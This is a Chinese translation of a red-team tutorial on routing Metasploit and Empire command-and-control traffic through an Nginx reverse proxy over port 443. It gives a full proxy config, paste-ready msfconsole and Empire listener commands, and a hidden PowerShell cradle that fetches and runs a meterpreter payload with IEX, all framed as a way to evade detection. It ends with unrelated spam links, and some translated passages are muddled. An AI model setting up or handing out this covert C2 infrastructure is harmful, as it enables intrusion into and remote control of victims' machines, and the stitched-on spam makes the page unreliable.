文章插图
翻译：WisFree
预估稿费：200RMB（不服你也来投稿啊！）
投稿方式：发送邮件至linwei#360.cn，或登陆网页版在线投稿
基础知识
目前流行的指挥控制(CC)工具大多通过HTTP传输网络通信数据，如Metasploit和Empire 。对于CC工具来说，HTTP协议是比较高效的选择，主要是因为它适用于目前几乎所有类型的通信网络和网络设备 。此外，使用“HTTPoverTLS”可以为这些工具增加额外的安全层，因为这项技术将使我们更难检测CC流量 。如果企业或组织有正确配置的网络代理，该代理可以执行SSL/TLS检查，这将有助于安全技术人员更好地检测CC流量 。然而，在我帮助测试的组织中，采取这种安全措施的并不多 。
为了掩盖所有非法操作，通过HTTP协议传输的CC流量应该通过端口80或端口443发送 。如果用8080这样的特殊端口发送CC数据，不仅会引起管理员的怀疑，还会逃过安全防护软件的检测 。我个人喜欢在同一台主机上使用多种类型的工具 。如果我想在一台主机上使用帝国和Metasploit的网络传输模块，我总共需要三个网络端口 。一般来说，我会选择使用端口80、端口8080和端口443 。但是现在，我希望所有的网络流量都通过端口443发送 。因此，我现在将使用剑盾提供的安全分析服务，这样我就可以使用CC代理来完成所有的分析操作 。
接下来，我计划使用Nginx构建一个反向代理服务器 。如下图所示，我们可以使用一个Web服务器同时处理多用户多工具的情况 。代理服务器配置完成后，代理规则将负责划分发送到C2服务器端口的流量 。此外，这种配置还可以隐藏CC服务器的“真实身份”(实际主机) 。Nginx不仅安装配置非常简单，操作起来也非常方便 。多用户多工具CC代理的架构图如下图所示：

文章插图
Nginx的安装与配置
【代理服务器ip地址和端口号,代理服务器】首先，在VPS服务器上安装你喜欢的Linux发行版，如果你愿意，也可以安装在自己的服务器上 。为了大家的方便，我选择在一台VPS主机上安装Ubuntu16.10 。如果学生在安装和操作Nginx时遇到困难，请参考本教程【教程获取】 。配置后，我的服务器只启用了端口80，只允许通过端口443发送网络流量 。
在测试开始之前，我们必须配置Nginx，否则代理服务器将不知道如何处理那些通信连接 。为了防止暴力攻击，我们需要为每个分析器分配一个GUID 。您可以单击此处生成相应的GUID 。我生成的GUID如下表所示：


文章插图

我总共设置了三个分析器，每一个分析器的相关配置信息如下所示：
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657#Analyst 1location /E0922BB0-684B-4ED3-967E-85D08880CFD5/ { proxy_redirect off; #Empire location /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/ { proxy_pass https://205.232.71.92:443; } #Metasploit location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/ { #Metasploit exploit/multi/script/web_delivery location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery { proxy_pass https://205.232.71.92:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned { proxy_pass https://205.232.71.92:80; } }}#Analyst 2location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/ { proxy_redirect off; #Empire location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/e/ { proxy_pass https://1.2.3.5:443; } #Metasploit location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/ { #Metasploit exploit/multi/script/web_delivery location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Delivery { proxy_pass https://1.2.3.5:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Pwned { proxy_pass https://1.2.3.5:80; } }}#Analyst 3location /6012A46E-C00C-4816-9DEB-7B2697667D92/ { proxy_redirect off; #Empire location /6012A46E-C00C-4816-9DEB-7B2697667D92/e/ { proxy_pass https://1.2.3.6:443; } #Metasploit location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/ { #Metasploit exploit/multi/script/web_delivery location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Delivery { proxy_pass https://1.2.3.6:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Pwned { proxy_pass https://1.2.3.6:80; } }}由于我们要让Nginx需要区分出Metasploit和Empire的请求，所以我突发奇想，打算用‘m’来代表Metasploit，用‘e’来代表Empire 。Empire的C2请求如下所示：
1https://myc2proxy.com/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/index.asp现在，既然我们已经可以确定传入的HTTP请求所使用的语句了，那么Nginx就需要将每一个请求转发至适当的分析代理服务器中，这项操作可以使用Nginx配置文件（/etc/nginx/sites-enabled/default）中的定位指令来完成 。在这篇文章中，我们要为每一个分析器分别设置四个定位指令 。在上面这段代码中，最外层的指令将会与分析器的GUID进行匹配 。内层的定位指令主要用来匹配针对特定工具的请求，例如‘e’（Empire）和‘m’（Metasploit） 。Metasploit的定位指令包含两个子定位指令，这两个指令可以用来匹配传入Metasploit特定模块和监听器的网络请求 。
现在，C&C代理服务器应该配置完成并且可以正常运行了 。如果配置无误的话，我们将只能使用TLS连接和端口443来与服务器进行通信 。
Metasploit的安装与配置
众所周知，Metasploit提供了很多的功能模块，我们可以使用这些模块来与目标用户的计算机建立C2连接 。我个人比较喜欢使用“exploit/multi/script/web_delivery”模块来作为launcher 。我之所以非常喜欢这个模块，主要是因为它可以将meterpreter（ShellCode）注入至目标主机的内存中 。这是一种非常理想的情况，因为你可以直接使用目标主机中的内置工具来进行操作，而不必向目标主机发送任何的文件 。
接下来，我们要加载Nginx配置文件所需要使用的Metasploit模块，并使用URIPATH来对其进行设置 。需要注意的是，自带的payload handler必须被禁用，因为我们要单独配置这些payload 。在配置这个模块的过程中，payload使用的是“windows/x64/meterpreter/reverse_https”，然后将LHOST和LPORT设置为C2代理服务器的IP地址和端口号 。请注意，这里可千万不要设置成后台C2服务器的IP地址了 。除此之外，我们还要设置与payload（例如Pwned）和Nginx中的指令相匹配的LURI 。虽然相应的监听器根本不会启动，但我们仍然要去配置这些payload 。因为接下来当模块被执行之后，我们要使用这些设置来生成显示在屏幕中的启动命令 。我们可以将下面给出的这段指令直接复制粘贴到msfconsole中来配置并启动该模块：
12345678910use exploit/multi/script/web_deliveryset URIPATH /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Deliveryset DisablePayloadHandler trueset SSL Trueset TARGET 2set payload windows/x64/meterpreter/reverse_httpsset LHOST myc2proxy.comset LPORT 443set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwnedrun –j下图显示的是Metasploit中web_delivery模块的配置信息：


文章插图

当模块被执行后，屏幕中会显示一个包含有启动代码的字符串 。请注意：必须将网络端口由8080改为443，否则之后将无法再进行修改了 。除此之外，我们还必须手动去修改，因为我们的C2代理只会接受来自端口443的通信请求 。这个字符串如下所示：
1powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$o=new-object net.webclient;$o.proxy=[Net.WebRequest]::GetSystemWebProxy();$o.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $o.downloadstring('https://myc2proxy.com:8080/E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery');接下来，将LHOST设置为0.0.0.0，LPORT设置为80（端口号的设置可以根据后台C2服务器来选择） 。我们还需要配置OverrideLHOST、OverrideLPORT、以及OverrideRequestHost来确保payload可以直接与C2代理服务器进行对话 。我们可以将下面给出的命令直接复制粘贴到msfconsole中来配置并启动该模块：
12345678910use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_httpsset LHOST 0.0.0.0set LPORT 80set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwnedset OverrideLHOST myc2proxy.comset OverrideLPORT 443set OverrideRequestHost trueset ExitOnSession falserun –j下图显示的是reverse_https的payload配置信息：


文章插图

Empire的安装与配置
虽然Empire是我最喜欢的一款工具，但是在配置代理服务器的过程中，使用Empire之前还是有几个障碍需要克服的，相比之下Metasploit的配置和使用就简单多了 。在PowerShell v1中，初始链接序列所使用STAGE0、STAGE1和STAGE2是在empire.db的配置表中定义的 。在我看来，我们是无法在Empire CLI中修改这部分数据的，所以我们必须直接手动修改数据库 。但是，PowerShell Empire v2并没有使用这种架构 。我建议各位同学使用git来下载Empire v2分支，命令如下：
1cd /opt;git clone -b 2.0_beta https://github.com/adaptivethreat/Empire.git下载完成之后，启动应用 。由于Empire监听器所使用的端口必须与C2代理服务器的监听端口相同，所以Empire必须使用端口443和HTTPS协议 。我们可以直接将下面给出的这段命令复制粘贴进Empire中来配置监听器：
123456789listenersuselistener httpset DefaultProfile /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/admin/get.php,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/news.asp,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;rv:11.0) like Geckoset Name EmpireC2set CertPath /opt/Empire/data/empire.pemset Host https://myc2proxy.comset Port 443executelauncher powershellEmpire监听器的配置信息如下图所示：


文章插图

执行
现在，我们已经为Nginx C2代理配置好了一个用于分析数据流量的后台C2服务器了 。接下来，我们要在测试主机中执行我们所生成的其中一个launcher，你将会在后台C2服务器中看到测试主机的shell 。为了增加安全措施，配置后台C2服务器只允许当前C2代理访问 。
结论
代理可以用来保持后台服务的匿名性 。当你需要在某个网络中进行命令控制活动时，代理所提供的这种特性是非常有用的 。由于HTTPS的通信数据足够安全，因此现在越来越多的网络都开始使用HTTPS来进行通信了 。但是，这也将有助于我们躲避安全产品的检测 。

• 口头馋槟榔是正规厂家么,伍子醉枸杞槟榔代理商加盟
• 初感避孕套多少钱一盒 初感怎么加入代理
• 家装加盟 饮料招代理商
• 加盟超市有哪些品牌 日用品招商加盟代理厂家
• 代理记账年度工作总结 代理记账工作内容
• 休闲食品代理招商网 休闲零食小吃代理招商
• 2021年饮料招商网,二三线饮料品牌饮料代理
• 2020新上市饮料代理,78创业商机网
• 免费一件代发正规平台 代理一件代发免费货源
• 电脑怎么查看ip地址？众所周知|电脑怎么查看ip地址？